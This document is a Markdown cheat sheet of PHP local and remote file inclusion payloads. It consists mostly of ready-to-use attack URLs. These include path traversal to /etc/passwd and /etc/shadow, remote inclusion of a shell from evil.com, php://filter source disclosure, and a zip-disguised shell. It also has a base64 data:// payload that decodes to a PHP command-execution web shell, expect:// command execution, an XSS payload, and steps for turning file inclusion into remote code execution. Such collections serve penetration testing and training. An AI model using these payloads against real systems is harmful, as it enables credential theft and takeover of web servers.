# Local/Remote File Inclusion The File Inclusion vulnerability allows an attacker to include a file, usually exploiting a "dynamic file inclusion" mechanisms implemented in the target application. ## Basic LFI (null byte, double encoding and other tricks) ``` http://example.com/index.php?page=etc/passwd http://example.com/index.php?page=etc/passwd%00 http://example.com/index.php?page=../../etc/passwd http://example.com/index.php?page=%252e%252e%252f http://example.com/index.php?page=....//....//etc/passwd ``` Interesting files to check out : ``` /etc/issue /etc/passwd /etc/shadow /etc/group /etc/hosts /etc/motd /etc/mysql/my.cnf /proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor) /proc/self/environ /proc/version /proc/cmdline ``` ## Basic RFI (null byte, double encoding and other tricks) ``` http://example.com/index.php?page=http://evil.com/shell.txt http://example.com/index.php?page=http://evil.com/shell.txt%00 http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt ``` ## LFI / RFI Wrappers LFI Wrapper rot13 and base64 - php://filter case insensitive ``` http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php can be chained with a compression wrapper http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd ``` LFI Wrapper ZIP ```python echo "" > payload.php; zip payload.zip payload.php; mv payload.zip shell.jpg; rm payload.php http://example.com/index.php?page=zip://shell.jpg%23payload.php ``` RFI Wrapper DATA with "" payload ``` http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4= ``` RFI Wrapper EXPECT ``` http://example.com/index.php?page=php:expect://id http://example.com/index.php?page=php:expect://ls ``` ## Bonus XSS XSS via RFI/LFI with "" payload ``` http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+ ``` ## LFI to RCE via /proc/*/fd 1. Upload a lot of shells (for example : 100) 2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too) ## LFI to RCE via Upload ``` http://example.com/index.php?page=path/to/uploaded/file.png ``` You can injected the into the metadata ## LFI to RCE via Phpinfo() https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf Use the script phpInfoLFI.py (also available at https://www.insomniasec.com/downloads/publications/phpinfolfi.py) ## Thanks to * [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion) * [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/) * [Turning LFI to RFI ](https://l.avala.mp/?p=241) * [Is PHP vulnerable and under what conditions?](http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html)